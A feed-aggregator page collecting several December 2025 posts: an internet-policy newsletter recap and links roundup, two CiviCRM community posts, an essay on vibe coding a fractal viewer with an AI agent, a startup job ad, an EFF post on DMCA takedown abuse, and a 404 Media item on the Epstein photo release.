Planet Jamie

Our 5 Most-Read Articles of 2025

Internet Exchange

internet.exchangepoint.tech

2025-12-18 17:05:42

From digital sovereignty to encryption and online safety. A look back at the pieces readers engaged with most this year....

Original Article

internet governance

From digital sovereignty to encryption and online safety. A look back at the pieces readers engaged with most this year.

Photo by Reinis Birznieks / Unsplash

We’re taking a short break over the holidays to spend time with our families. Before we go, we want to say thank you for reading, subscribing, and joining us on this journey.

We accomplished a lot this year, we published more than 50 articles: one every week. I joined as Editor-in-Chief, and together we’ve grown our subscriber base by nearly 40%, hosted our first event , launched a paid offering and a bookshop , and expanded our contributor community. Three of those contributors appear in our top five most-read posts this year, which feels like a pretty good measure of what this publication is becoming.

Out of everything we published in 2025, these five pieces were the most read. While we’re away, we’re resurfacing them in case you missed them, or want to revisit what resonated most with readers this year.

Thank you for being part of Internet Exchange. Happy holidays, and we’ll see you soon.

5. Europe’s Digital Sovereignty: Is the Political Will Ever Coming?

By Tara Tarakiyee

Eight years after Europe declared digital sovereignty a political priority, the gap between ambition and reality has only widened. Despite repeated commitments and mounting dependence on US technology firms, Europe continues to underinvest in the infrastructure and policies required to make sovereignty more than a slogan.

4. If It Breaks Wikipedia, It’s Probably Bad Policy

By me! Audrey Hingle

Bad internet policy has a tell: it assumes every online service is a profit-driven platform with data to monetize and users to manage. When those same rules start to break Wikipedia, a volunteer-run nonprofit that doesn’t sell ads or harvest personal data, something has gone wrong.

3. Big Tech Redefined the Open Internet to Serve Its Own Interests

By Burcu Kilic and Mallory Knodel

The internet was built on open standards, interoperability, and the idea that no single actor should control how people connect or communicate. “Open” once meant decentralized systems governed in the public interest. Today, Big Tech uses that same language to defend platforms that are anything but: closed, centralized systems built around surveillance, data extraction, and market dominance.

2. Why Feminists Must Defend Encryption

By Mallory Knodel

The debate over encryption is often reduced to a false choice between online safety and privacy. This framing obscures how essential secure communication is for women, queer people, and gender minorities who rely on encryption to seek help, organize, and protect themselves from abuse and surveillance. (If you like that post, you’ll love our upcoming event. )

1. The Dog That Caught the Car: Britain’s ‘World-Leading’ Internet

By Heather Burns

Our most read post this year was by Heather Burns , a Glasgow-based "tech policy wonk" who advocates for policy and technology that keeps the internet open, globally connected, secure, and trustworthy. She’s been Extremely Online since 1994.

The UK’s Online Safety Act was sold as a “world-leading” child-protection law, she writes, one that would make Britain a model for the rest of the world. Instead, it has normalized the idea that governments can bolt identity checks and surveillance layers onto the internet, then call the result “safety.”

From the Group Chat 👥 💬

This week in our Signal community, we got talking about:

Following the Online Safety Act, which introduced age verification for adult content on mainstream platforms despite well-documented privacy and security risks , the UK government is now reportedly “encouraging” Apple and Google to introduce device-level nudity controls . Under the proposal, iOS and Android would use nudity-detection algorithms to block the display, creation, or sharing of nude images unless users first verify that they are adults, potentially via biometric checks or official ID. While ministers say the measures would be voluntary for now, officials have already explored making them mandatory in the future. The approach closely mirrors one of the NSPCC’s policy asks .

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This Week's Links

Internet Governance

Bernie Sanders’ call to halt data centre construction is a warning about an AI boom that’s enriching Big Tech while pushing the environmental, financial, and social costs onto local communities explains Steven Render, ED of MediaJustice. https://www.linkedin.com/in/stevenrenderos
Joseph Gordon-Levitt is launching the Creators Coalition on AI , calling on artists and digital creators to band together against the unethical business practices of big AI companies before they reshape entire creative industries on their own terms. https://journal.hitrecord.org/p/announcing-the-creators-coalition
Daphne Keller argues that if “publicly accessible” data under the DSA is defined too narrowly, platforms could once again block the very research the law was designed to enable. https://www.techpolicy.press/how-the-meaning-of-publicly-accessible-shapes-researcher-data-rights-under-the-dsa
As AI chatbots increasingly replace traditional search engines, a new AI Forensics report warns that existing EU rules leave dangerous gaps in oversight, and calls for anticipatory governance to address the unique risks of AI-powered search. https://aiforensics.org/work/governing-ai-search
A new CDT workshop highlights how embedding human rights into technical standards will require institutional change inside standards bodies, not just good intentions or high-level principles. https://cdt.org/insights/embedding-human-rights-in-technical-standard-setting-institutional-change-and-governance
The UK can turn convening power, technical expertise, and industry influence into lasting global leadership on frontier AI governance: without waiting for new legislation write Dr Imogen Stead and Dr Jess Whittlestone. https://www.longtermresilience.org/reports/advancing-the-uks-global-leadership-in-frontier-ai-governance

Digital Rights

India’s proposed SIM binding rules would force messaging apps to work only when a specific SIM card is physically present in a device, tying digital access to a fragile, easily lost phone number. As MediaNama explains, this approach risks breaking essential communication for people in crisis, prepaid users, workers, and families—without meaningfully stopping fraud. https://www.medianama.com/2025/12/223-real-world-use-cases-sim-binding-restricts-nama
The US Government intends to force visitors to submit their digital history and DNA as the price of entry. With this much data AI tools will likely be deployed to unlock details of your life for border and immigration agencies. https://privacyinternational.org/news-analysis/5713/trump-administration-wants-your-dna-and-social-media
Developers of apps like Signal or WhatsApp that use end-to-end encryption to protect private communications could be considered hostile actors in the UK. https://www.techradar.com/vpn/vpn-privacy-security/creating-apps-like-signal-or-whatsapp-could-be-hostile-activity-claims-uk-watchdog

Technology for Society

Apps like OpenAI’s Sora are already fooling millions of users, and even mainstream news outlets, into believing AI-generated videos are real, despite warning labels. The result is a flood of believable but fake videos that are widely treated as real, prompting racist abuse, moral outrage, and attacks on marginalized groups. https://www.nytimes.com/2025/12/08/technology/ai-slop-sora-social-media.html
Creative Commons’ CC Signals project aims to rebuild trust in the digital commons by giving creators new ways to signal how their work should be used in AI development, while preserving openness and reciprocity. https://creativecommons.org/2025/12/15/cc-signals-what-weve-been-working-on
A conversation with Tech Global Institute’s Sabhanaz Rashid Diya explores how prosocial design frameworks rooted in Western values often fail the Global Majority, and why responsible tech must account for collective rights, local context, and power differences across the world. https://www.prosocialdesign.org/blog/prosocial-design-values-in-the-global-majority-a-pro-social-recap
Data & Society’s Democratizing AI for the Global Majority series examines how AI systems built in the Global North can reproduce colonial power dynamics, and why centering local knowledge and community agency is essential for a more just technological future. https://datasociety.net/points/democratizing-ai-for-the-global-majority
As the tech industry accelerates AI development and data centre expansion, a new Data & Society report argues that meaningful climate action will require moving beyond corporate sustainability metrics toward worker organising and community-led resistance that confronts tech’s environmental harms head-on. https://datasociety.net/library/turning-the-tide/
At a WSIS+20 side event, digital and AI financing was reframed as a question of public value, equity, and global economic justice, not just innovation investment. https://itforchange.net/wsis20-side-event-financing-digital-innovation-ecosystems-majority-world
APC welcomed WSIS+20’s renewed commitment to human rights and multistakeholder internet governance, while warning that without inclusive, accountable financing for digital development, global digital inequality will only deepen. https://itforchange.net/wsis20-side-event-financing-digital-innovation-ecosystems-majority-world

Upcoming Events

The Strategy Design Festival is a one-day, highly interactive event for organisations that want strategy to be a shared, living practice, not a document on a shelf. January 20 . London, UK. https://www.fabriders.net/strategy-design-festival
Protocols for Publishers are meeting to discuss how we can preserve an open, equitable web, where no one company holds the keys. Feburary 4-5. London, UK. https://protocolsforpublishers.com/pfp-london-dates-and-early-speakers

Careers and Funding Opportunities

United States

Salesforce: Senior/Lead Applied Scientist, Responsible AI. Palo Alto, CA. https://careers.salesforce.com/en/jobs/jr298047/seniorlead-applied-scientist-responsible-ai
Roblox: Senior User Researcher, Safety. San Mateo, CA. https://careers.roblox.com/jobs/7441541
The Brennan Center for Justice at NYU School of Law: Technology Policy Strategist, Liberty and National Security Program. New York, NY. https://brennancenter.applytojob.com/apply/7G4Zjj3md0/Technology-Policy-Strategist-Liberty-And-National-Security-Program
Gates Foundation: Deputy Director, AI Infrastructure for Education. Seattle, WA. https://gatesfoundation.wd1.myworkdayjobs.com/Gates/job/Seattle-WA/Deputy-Director--AI-Infrastructure--US-Education-Data-_B021318-1
Microsoft: Responsible AI Assessment Lead. Multiple Locations, US. https://apply.careers.microsoft.com/careers/job/1970393556640371
Google. Multiple Locations, US .
- Curriculum Manager, Trust and Safety. https://www.google.com/about/careers/applications/jobs/results/139208565045764806-curriculum-manager-trust-and-safety
- Learning Design Manager I, Trust and Safety. https://www.google.com/about/careers/applications/jobs/results/74802118090728134-learning-design-manager-i-trust-and-safety

Global

The European AI & Society Fund: Programme and Grants Officer. Brussels, BE. https://apply.workable.com/nef/j/C4F49A6EB5
UCL: Funded PhD Project, Designing user reporting tools for online social platforms. London, UK. https://www.findaphd.com/phds/project/designing-user-reporting-tools-for-online-social-platforms/?p192806
GovAI: Summer Fellowship 2026, Research Track. London, UK . https://www.governance.ai/post/summer-fellowship-2026-research-track
The AI Security Institute: Research Scientist, Open Source Technical Safeguards. London, UK. https://job-boards.eu.greenhouse.io/aisi/jobs/4721474101
ICO.: Principal Policy Adviser - AI Policy. Multiple Locations, UK . https://ico.wd3.myworkdayjobs.com/en-GB/ICO/job/Wilmslow-Cheshire/Principal-Policy-Adviser_JR676
Access Now: Platform Engagement Coordinator. Multiple Locations, Hybrid . https://accessnow.bamboohr.com/careers/229

What did we miss? Please send us a reply or write to editor@exchangepoint.tech .

Everyone is actually that nice: reflecting on my first CiviCamp & sprint

CiviCRM

civicrm.org

2025-12-18 10:48:03

This October I spent five inspiring days in the Netherlands for CiviCamp Europe 2025 — a week that brought together users, developers, and implementers of CiviCRM to learn, share, and collaborate. From a packed one-day conference to hands-on training and a busy community sprint, it was a perfect mix...

Original Article

This October I spent five inspiring days in the Netherlands for CiviCamp Europe 2025 — a week that brought together users, developers, and implementers of CiviCRM to learn, share, and collaborate. From a packed one-day conference to hands-on training and a busy community sprint, it was a perfect mix of learning, teaching, and building together. The other day my phone made me a slide show of memories. It made me reflect on how silly I’d been to feel nervous before going along, and prompted me to share my experience with a few tips in case you’re also on the verge of getting more involved in CiviCRM as your new years resolution!

group photo taken outside on the grass with trees as the backdrop

I am Abi, an ex CiviCRM user turned implementer attending my first sprint after joining the team at Third Sector Design two months prior to the event. I’ve been to Civi events and meet-ups in the UK before as a user so I was coming in with fresh eyes and a new mindset this year! There were familiar faces amongst a crowd of new people with fascinating stories and reasons for being there. If the organised activities weren't so interesting I could have sat around chatting all week - no problem.

**Everyone is actually that nice**

The general tone set out from the start was one of open mindedness - collaboration and a feeling of “we’re in this together”. Throughout the week we spent time working together, learning together, eating together and chilling together. And if you were unlucky enough to be on my team, losing at pool together.

The week absolutely flew by and there’s so many different ways to get stuck in (or take time out if that’s more you). I didn’t manage to use the running shoes I packed, but there were people up and exploring the local area and making the most of being together in such a beautiful setting.

Having not attended a sprint in the past, this was the part of the week that felt most unfamiliar to me at first. But helpfully, everyone gave an update on what they planned to do both at the start of the sprint, and on the Thursday, when those that had been involved with the training joined the pack. My colleagues were cracking on with their projects: a Nuxt integration for CiviCRM , a WordPress Docker image for CiviCRM and tweaking the user interface for FormBuilder. I got to dip into discussions about future events, improving the documentation and “the great AI debate”!

You can’t help but get inspired

The lightning talks that took place on the Monday were as varied as they were inspiring, and are always a highlight for me - previously using this part of the day to make a mental “shopping list” of features I want to try once they’re available. Some of these were then explored in more detail towards the end of the week during the sprint, in some cases with an opportunity to get involved in adapting or testing the new tools that might be the next new thing at a future event!

A particularly practical talk walked through address-lookup challenges in Belgium, where addresses can be written in multiple languages. Using OpenStreetMap and structured fields, they showed clever ways to keep data clean. And speaking of clean data, my colleague Kurund shared a quick tip for keeping bots out of subscriber lists which I know made it to multiple users’ “shopping lists”.

I particularly enjoyed the number of “no-code” or “low-code” approaches using SearchKit and FormBuilder. Lots of teasers of exciting things to come, and/or get involved with throughout the week…

Photo taken from the back of a break-out room with Patricia from Repowering London stood presenting at the front of the room.

But, it’s not just the strangers that become friends that spark new ideas. My colleagues each contributed to the agenda at various stages of the week, and during the camp we delivered a workshop alongside Patricia from Repowering London who has been involved in our CiviShares work for the last year or so. The workshop was showcasing how Third Sector Design have built an extension to support societies to manage their share offers using CiviCRM as a platform. Having that chance to listen and see the project from a new perspective was really great.

One theme that kept coming up was how much more powerful CiviCRM is becoming thanks to SearchKit and FormBuilder. I was particularly struck by a demo showing how membership organisations could build interactive pages — including grid and even map-based displays of members — all without custom code. Someone showed a form that combined a search view and a submission action, which opened my eyes to how flexible FormBuilder is becoming.

I also loved hearing from Hamburg Community Foundation about their funding application framework, involving a clever combination of a public-facing applicant portal and a structured back-office workflow. I thought it was a great example of the kind of dual-interface tools nonprofits often need.

I was learning without noticing

Through Tuesday and Wednesday I tagged along to the user admin training which was a crash course for what we branded “beginners” and “advanced beginners” to explore a fresh CiviCRM environment and ask any and all of those niggly questions that you’ve just never been able to get to the bottom of in the office or back home. In a room along the corridor another group got stuck into the developer training, which sounded engaging and useful particularly for the more technically advanced friends I chatted to over lunch!

Even in the final two days when I thought my brain must be full with new connections and tips from the community, just being immersed in the programme saw me tagging along to more conversations and discussions that I’d never dream of if I were at my desk at home.

There’s not much left to say other than a huge thank you to everyone who helped organise and coordinate CiviCamp Europe in Lunteren. And thanks to everyone that I met and got to know during our stay. I met Liz from MJW in the Netherlands and have since enjoyed reading about her experience too , as we were in a similar boat as relative newbies being brought into the fold!

October might feel like a while ago and maybe it’s the Christmas spirit as hinted at above that has me feeling hopeful for the new year. I know through discussions throughout the week that there are lots of exciting plans for 2026 in the Civi world, so watch this space and get involved when you get the chance to - you won’t regret it.

Connecting CiviCRM to AI and Automation with n8n

CiviCRM

civicrm.org

2025-12-17 17:04:30

We introduce a community n8n node that connects CiviCRM to automation and AI-enabled workflows via the API v4, making it easier to integrate CiviCRM with external tools in a transparent and reusable way....

Original Article

New n8n Node available for the CiviCRM Community

At iXiam , we have developed and published n8n-nodes-civicrm , a community node that connects CiviCRM directly to n8n via its API v4.

The verification process for the node is nearing completion. This review, handled by the n8n team, covers technical quality and security considerations and is required for the node to be available in managed and enterprise n8n environments.

What is n8n?

n8n (pronounced “n-eight-n” ) is a workflow automation platform that lets you connect applications, databases, and APIs so routine work happens automatically. It acts as a “glue layer” between tools: you define a trigger (something happens) and a sequence of actions (what should happen next).

n8n is a flexible, visual, open-source platform that allows you to connect hundreds of services — from Google Sheets and Telegram to generative AI and social networks — without writing custom code.

Why is this integration relevant?

CiviCRM is a powerful platform, but it often operates in relative isolation. Many organisations struggle with:

getting data in and out cleanly
keeping systems in sync
turning data into reliable, repeatable actions

This is where n8n is useful: it connects CiviCRM to the rest of your stack and makes integrations automatic, consistent, and auditable .

With this node, agentic workflows such as the following become easier to implement:

Using AI to interact with CiviCRM data in natural language
Prospecting for strategic partners and automatically adding them to CiviCRM
Synchronising events, donations, or campaigns with external tools

What is a Node and how can you use it with CiviCRM?

An n8n node is a modular connector that allows a workflow to interact with a specific service or perform a defined task — in this case, CiviCRM.

By using the CiviCRM node, non-profits, NGOs, collectives, and third-sector organisations can integrate their core contact, donor, and partner management system with external tools such as:

MCP servers and AI models
LinkedIn and other Social Media
ERPs / other CRMs
Spreadsheets, email and calendar systems

Getting started with the CiviCRM Node

To use the CiviCRM node, you need to:

Run n8n Community Edition
Install the node:
- Go to Settings → Community Nodes → Install
- Enter: @ixiam/n8n-nodes-civicrm
Configure CiviCRM API credentials
Use the CiviCRM node as a step in an n8n workflow to read or write data

📦 Node and documentation:
https://www.npmjs.com/package/@ixiam/n8n-nodes-civicrm

Example Use Cases

Below are two illustrative examples from a much wider range of possible workflows.

Intelligent Assistant for Donor and Partner Management

Inspired by n8n’s AI Personal Assistant templates, this workflow allows teams to ask everyday questions such as:

“Who donated more than €500 this month?”
“Which partners’ memberships expire next week?”

The workflow interprets the question, queries CiviCRM, and returns structured results.

Prospecting and qualifying Strategic Partners with AI

Based on templates such as Search LinkedIn Companies and Score with AI , this workflow is designed for NGOs seeking:

foundations
B Corps
public administrations
similar aligned organisations

Relevant organisations can be created in CiviCRM with tags, notes, and follow-up activities.

Feedback Welcome

We’re sharing this node as part of the CiviCRM ecosystem , with the aim of reducing duplicated work, encouraging reuse, and making integrations more approachable.

Feedback, issues, and ideas are very welcome, especially around:

missing entities or actions
API edge cases
documentation clarity
example workflows that could benefit others

If you have feedback, questions, or ideas for improvement, feel free to contact us at info@ixiam.com or visit ixiam.com / civi-go.net

Two Kinds of Vibe Coding

Hacker News

davidbau.com

2025-12-18 21:16:25

Comments...

Original Article

Vibe Coding

I have been teaching myself to vibe code.

Back in 2009 I posted a simple Mandelbrot fractal viewer on the web: a single HTML file with inline Javascript. Just 329 lines of code, each pixel a tiny table cell. Click to zoom. Watch it iterate. That was about it!

I have wondered if improving the page could raise it in the Google rankings , so I have been using code LMs to make a number of improvements....

Two Kinds of Vibe Coding

There are two categories of vibe coding. One is when you delegate little tasks to a coding LM while keeping yourself as the human "real programmer" fully informed and in control.

The second type of vibe coding is what I am interested in. It is when you use a coding agent to build towers of complexity that go beyond what you have time to understand in any detail. I am interested in what it means to cede cognitive control to an AI. My friend David Maymudes has been building some serious software that way, and he compares the second type of vibe coding to managing a big software team. Like the stories you've heard of whole startups being created completely out of one person vibe coding .

When my students describe their own vibe coding, it sounds like the first kind. That is also how I started with my Mandelbrot project, pasting little algorithm nuggets into my code while I edited each function, making all the key decisions using my own human judgement.

But in the last couple weeks I have put on the blinders. I have resolved to stop looking at all the code in detail anymore. Instead, I am pushing the agent to write a ton of code, make its own decisions, to hell with the complexity. I have been experimenting with the second kind of vibe.

It is working surprisingly well, and I have been thinking about my experience handing the reins to an AI agent. The workflow may presage the use of generative AI across other industries. And I have arrived at two basic rules for vibe coders.

Unleashing Claude on my Webpage

The last human-written version of the webpage without LLM assistance was 780 lines ; you can see its 37 functions diagrammed below. It is a nice elegant piece of code, but pretty simplistic as a fractal implementation.

A key litmus test for a fractal viewer is how deep and fast it goes. By these measures, my human-written program was amateurish. Here is a picture of the output of the 780-line version at 0.40616753 67769961 +0.14576215 21782999i, after running for 30 minutes zoomed by 15 orders of magnitude. It is badly pixelated, because the 10 ¹⁵ scale exceeds the limits of Javascript's 64-bit precision floating point numbers. And it is pretty slow: if you click below, you can see that it takes several minutes just to get the first pixels, working one main browser thread, pausing when you click to a different tab.

Compare to how the LLM-assisted version renders the following image, after just one minute of work, at the same location and zoom level:

The LLM version is much faster because it uses the GPU (if your web browser allows it). But it plays many more tricks than just moving the calculation from CPU to GPU, because although the GPU is hundreds of times faster than a CPU, its 7-digit fp32 is also millions of times coarser than the CPU's 15-digit fp64. So the LLM-generated program deals with this by implementing perturbation algorithms to split the work between CPU and GPU, calculating numbers as (z+d·2 ^s ) where z is a sparse high-resolution vector on the (slow but precise) CPU and d and s are dense near-zero low-resolution vectors on the (fast but imprecise) GPU.

There are multiple ways to implement perturbation algorithms, and so the LLM code implements and benchmarks nine alternative approaches, selecting different algorithms at different zoom levels and compute availability to follow the Pareto frontier of time/resolution tradeoff. Backing the algorithms it has written quad-double precision arithmetic accurate to 60+ digits, an adaptive float32+logscale numeric complex representation, GPU buffer management, and a task scheduler that can serialize and migrate long-running CPU tasks between WebWorker threads. It has also added many other UI details I asked for, like a minimal MP4 encoder for recoding smooth movies and a cache to reduce recalculation when using the browser's forward/back history. The little webpage includes implementations of Horner's algorithm for stable polynomials, Fibonacci series for aperiodic periodicity checks, Catmull-Rom splines for smooth animations, continued fractions for pretty ratios, spatial hashing for finding nearby points, an algorithm for rebasing iterated perturbations that it found in a 2021 forum post , and a novel algorithm for fast orbit detection it developed based on my suggestion. All with detailed documentation and a search-engine-optimized internationalized user interface explained in the most commonly-read eleven languages on the Internet. That last part, with all the translations to Chinese and Arabic, took Claude just a few minutes while I was cooking breakfast.

The cost of this performance? A large increase in complexity. Empowered to make direct changes in the project, Claude Code has now made several hundred commits , expanding the tiny one-page HTML file to more than 13,600 lines of code, defining 30 classes, 2 mixins, 342 methods, and 159 functions.

That brings me to the rules for getting an LLM agent to work effectively: David's two rules for vibe coding. They are simple rules.

Rule 1: Automate tests

If you just ask the agent to solve a problem, it will run around for a few minutes and come back with a rough solution. Then you test it, find it doesn't work, tell it so, and it runs around again for another five minutes. Repeat.

This workflow turns you into the manual tester. Maybe the least interesting job on the planet. Not a good use of precious human brain cells.

But if you get the agent to write a good automated test first, something changes. After it runs around for five minutes, it remembers to check its own work. It sees how it got things wrong. It goes back and tries again. Now it can extend its horizon to 30 minutes of autonomous work. By the time it comes to bother you, the result is much more promising.

Rule 2: Test the tests

But after a while, you realize the 30-minute interrupts are only a bit better than the 5-minute ones. The agent is good at finding holes in your tests. It produces stupid solutions that don't do what you want but still pass, because the tests were not actually good enough.

So: test the tests.

Testing tests is the kind of thankless metaprogramming that a development manager spends all their time doing, to make their team productive. For example: fuzz testing to discover new problems that need systematic tests. Code coverage to reveal what code exists but remains untested. Frameworks to make code more testable, for enabling benchmarking, for enabling troubleshooting. Hypothesis-driven testing to force the agent to form a theory about what might be wrong, then write tests that chase it down. This type of programming is the sort of painful chore that can unlock productivity in a software development team. And it works very well when vibe coding also.

It is interesting that it can be hard to get a coding agent to understand why it is spending so much effort testing tests. For example, when getting Claude Code to construct a reliable code coverage framework, I gave it the mission of debugging why its initial attempt had produced the unbelievable (and untrue) assertion that 100% of lines had been covered by tests. Claude understood what it was trying to do at first, but when the going got tough, it kept giving up, saying "we don't need to do anything here; I just noticed, code coverage is already 100%!" Maybe testing its tests of the tests is too meta, just at the edge of its ability to follow.

But once you can get the metaprogramming right, and do it well, you can reach a kind of vibe coding nirvana. Because then, as a human, you can look at code again! Instead of facing thousands of jumbled lines vomited up by the agent, now you've got maps of the code, informed by code coverage, benchmarks, test harnesses, and other instrumentation. It lets you skip thinking about the 99% of routine code and focus your attention on the 1% most interesting code. The weird cases, the edge cases, the stuff that might deserve to be changed. That is a good use of precious human brain cells.

One limitation of this vibe approach is that tests catch bugs but not bloat. After developing comprehensive testing, I did find it helpful to make one human pass over the code to find opportunities for making code more symmetric (to make code near-duplication more obvious), and to remove some confusing code that was leading the agent astray. That opened the way for larger-scale vibe-coded refactoring that improved the elegance of the most intricate part of the code.

The two rules are not just coding hacks. They also reveal a path for keeping humans informed enough to remain in control.

Trucks and Pedestrians

My experience vibe coding reminds me of the difference between walking and driving a truck. Highway driving is a new skill, but with a truck you can haul a lot more stuff faster than you could dream of on foot. Vibe working with AI gets you out of the business of actual intellectual hauling. Instead it gets you into the business of taking care of the machine.

Working effectively with AI is much more abstract than traditional office work, because it demands that we build up meta-cognitive infrastructure, like the 422 automated tests and code coverage tools that I needed to effectively steer the development of my single webpage.

As we reshape the global economy around AI, it reminds me of the construction of the American interstate highway system . The speeding and scaling of cognition seems likely to lead to economy-wide boosts in "intellectual mobility," and a whole new culture with the equivalent of roadside service stations and even suburban flight. But it also strikes me that we do not want to live in a world where all decisions are made by large-scale AI, no more than we would want to live in a world where everyone gets everywhere in a truck. Our modern streets are too congested with dangerous vehicles, and I am not sure it is giving us the best life.

I like walking to work.

As AI edges humans out of the business of thinking, I think we need to be wary of losing something essential about being human. By making our world more complex—twenty times more lines of code!—we risk losing touch with our ability to understand the world in ways that dull our ability to make good decisions, that prevent us from even understanding what it is that we want in the world. I hope we can build metacognitive infrastructure that keeps our human minds informed. But as we build increasingly powerful abstractions, it will be both crucial and difficult to keep asking: Do we want this?

If you would like a sense of the structure and volume of code produced by vibe coding, you can scroll through the vibe-coded visualization of the evolution of the code through git commits . Or compare the code before ( pre-LLM code repo here ) and after ( current code repo ). In particular, read the agent's documentation of the development infrastructure it built for this little one-webpage project. That kind of tooling will be familiar to anybody who has worked on a large engineering team. And it is the kind of work needed to support human comprehension of complexity in the age of LLM agents.

Posted by David at December 16, 2025 11:15 AM

Delty (YC X25) Is Hiring an ML Engineer

Hacker News

www.ycombinator.com

2025-12-18 21:02:10

Comments...

Original Article

Transforming healthcare operations with AI agents

Machine Learning Engineer

$80K - $150K • San Francisco, CA, US / Remote

Role

Engineering, Machine learning

Visa

US citizenship/visa not required

Skills

Python, Machine Learning, Data Modeling, Data Analytics, Amazon Web Services (AWS)

Connect directly with founders of the best YC-funded startups.

Apply to role ›

About the role

About Us

Delty is building the healthcare’s AI operating system . We create voice-based and computer-based assistants that streamline clinical workflows, reduce administrative burden, and help providers focus on patient care. Our system learns from real healthcare environments to deliver reliable, context-aware support that improves efficiency and elevates the provider experience.

Delty was founded by former engineering leaders from Google, including co-founders with deep experience at YouTube and in large-scale infrastructure . You’ll get to work alongside people who built massive systems at scale — a chance to learn a lot and contribute meaningfully from day one.

We believe in solving hard problems together as a team, iterating quickly, and building software with long-term thinking and ownership.

What You’ll Do

Build and own production machine learning systems end-to-end : from data modeling and feature engineering to training, evaluation, deployment, and monitoring.
Design and implement data pipelines that turn raw, messy real-world healthcare data into reliable features for machine learning models.
Train and evaluate models for ranking, prioritization, and prediction problems (for example, identifying high-risk or high-priority cases).
Deploy models into production as reliable services or batch jobs, with clear versioning, monitoring, and rollback strategies.
Work closely with backend engineers and product leaders to integrate machine learning into real workflows and decision-making systems.
Make architectural decisions around model choice, evaluation metrics, retraining cadence, and system guardrails — balancing accuracy, explainability, reliability, and operational constraints.
Collaborate directly with founders and engineers to translate product and operational needs into scalable, maintainable machine learning solutions.

What We’re Looking For

At least 3 years of experience building and deploying machine learning systems in production.
Strong foundation in machine learning for structured (tabular) data, including feature engineering, regression or classification models, and ranking or prioritization problems.
Experience with the full machine learning lifecycle : data preparation, train/test splitting, evaluation, deployment, retraining, and monitoring.
Solid backend engineering skills : writing production-quality code, building services or batch jobs, and working with databases and data pipelines.
Good system design instincts : you understand trade-offs between model complexity, reliability, latency, scalability, and maintainability.
Comfort working in a fast-paced startup environment with high ownership and ambiguity .
Ability to clearly explain modeling choices, assumptions, and limitations to non-machine-learning stakeholders.

Bonus:

Experience working with healthcare or operational decision-support systems.
Experience building or integrating LLM systems in production, such as retrieval-augmented generation, fine-tuning, or structured prompting workflows.
Prior startup experience or founder mindset — we value ownership, pragmatism, and bias toward shipping.
Experience with model monitoring, data drift detection, or ML infrastructure tooling .

Why join

Learn from seasoned Google engineers : As former Google engineers who built systems at YouTube and Google Pay, we’ve operated at massive scale. Working alongside us gives you a chance to build similar systems and learn best practices, scale thinking, and software design deeply.
High impact : At a small but ambitious team, your contributions will influence architecture, product direction, and core features. You will have real ownership and see the effects of your work quickly.
Grow fast : We’re iterating rapidly; you’ll be exposed to the full stack, AI/ML pipelines, system architecture, data modeling, and product-level decisions — a fast-track to becoming a senior engineer or technical lead.
Challenging and meaningful work : We’re tackling the hardest part of software engineering: bridging AI-generated prototypes and robust, scalable enterprise-grade systems. If you enjoy thinking deeply about systems and building reliable, maintainable foundations — this is for you.

About Delty

Transforming healthcare operations with AI agents.

Founded: 2025

Batch: X25

Team Size: 4

Status: Active

Founders

Fair Use is a Right. Ignoring It Has Consequences.

Electronic Frontier Foundation

www.eff.org

2025-12-18 20:54:23

Fair use is not just an excuse to copy—it’s a pillar of online speech protection, and disregarding it in order to lash out at a critic should have serious consequences. That’s what we told a federal court in Channel 781 News v. Waltham Community Access Corporation, our case fighting copyright abuse ...

Original Article

Fair use is not just an excuse to copy—it’s a pillar of online speech protection, and disregarding it in order to lash out at a critic should have serious consequences. That’s what we told a federal court in Channel 781 News v. Waltham Community Access Corporation , our case fighting copyright abuse on behalf of citizen journalists.

Waltham Community Access Corporation (WCAC), a public access cable station in Waltham, Massachusetts, records city council meetings on video. Channel 781 News (Channel 781), a group of volunteers who report on the city council, curates clips from those recordings for its YouTube channel, along with original programming, to spark debate on issues like housing and transportation. WCAC sent a series of takedown notices under the Digital Millennium Copyright Act (DMCA), accusing Channel 781 of copyright infringement. That led to YouTube deactivating Channel 781’s channel just days before a critical municipal election. Represented by EFF and the law firm Brown Rudnick LLP, Channel 781 sued WCAC for misrepresentations in its takedown notices under an important but underutilized provision of the DMCA.

The DMCA gives copyright holders a powerful tool to take down other people’s content from platforms like YouTube. The “notice and takedown” process requires only an email, or filling out a web form, in order to accuse another user of copyright infringement and have their content taken down. And multiple notices typically lead to the target’s account being suspended, because doing so helps the platform avoid liability. There’s no court or referee involved, so anyone can bring an accusation and get a nearly instantaneous takedown.

Of course, that power invites abuse . Because filing a DMCA infringement notice is so easy, there’s a temptation to use it at the drop of a hat to take down speech that someone doesn’t like. To prevent that, before sending a takedown notice, a copyright holder has to consider whether the use they’re complaining about is a fair use. Specifically, the copyright holder needs to form a “good faith belief” that the use is not “authorized by the law,” such as through fair use.

WCAC didn’t do that. They didn’t like Channel 781 posting short clips from city council meetings recorded by WCAC as a way of educating Waltham voters about their elected officials. So WCAC fired off DMCA takedown notices at many of Channel 781’s clips that were posted on YouTube.

WCAC claims they considered fair use, because a staff member watched a video about it and discussed it internally. But WCAC ignored three of the four fair use factors. WCAC ignored that their videos had no creativity, being nothing more than records of public meetings. They ignored that the clips were short, generally including one or two officials’ comments on a single issue. They ignored that the clips caused WCAC no monetary or other harm, beyond wounded pride. And they ignored facts they already knew, and that are central to the remaining fair use factor: by excerpting and posting the clips with new titles, Channel 781 was putting its own “spin” on the material - in other words, transforming it. All of these facts support fair use.

Instead, WCAC focused only on the fact that the clips they targeted were not altered further or put into a larger program. Looking at just that one aspect of fair use isn’t enough, and changing the fair use inquiry to reach the result they wanted is hardly the way to reach a “good faith belief.”

That’s why we’re asking the court to rule that WCAC’s conduct violated the law and that they should pay damages. Copyright holders need to use the powerful DMCA takedown process with care, and when they don’t, there needs to be consequences.

The Government Added a Comments Section to the Epstein Photo Dump

403 Media

www.404media.co

2025-12-18 20:53:49

Oversight Democrats released a new trove of Epstein pictures on Dropbox and left the comments on....

Original Article

Thursday afternoon House Democrats publicly released a new trove of photographs they’ve obtained from the estate of Jeffrey Epstein via Dropbox. They left the comments on so anyone who is signed into Dropbox and browsing the material can leave behind their thoughts.

Given that the investigation into Epstein is one of the most closely followed cases in the world and a subject of endless conspiracy theories, and that the committee released the trove of photographs with no context, it’s not surprising that people immediately began commenting on the photographs.

“Really punchable face,” BedeScarlet—whose avatar is Cloud from Final Fantasy VII — said above a picture of New York Times columnist David Brooks. Brooks, who wrote a column about his boredom with the Epstein case in November, attended a dinner with Epstein in 2011 and appears in two photographs in this new document dump.

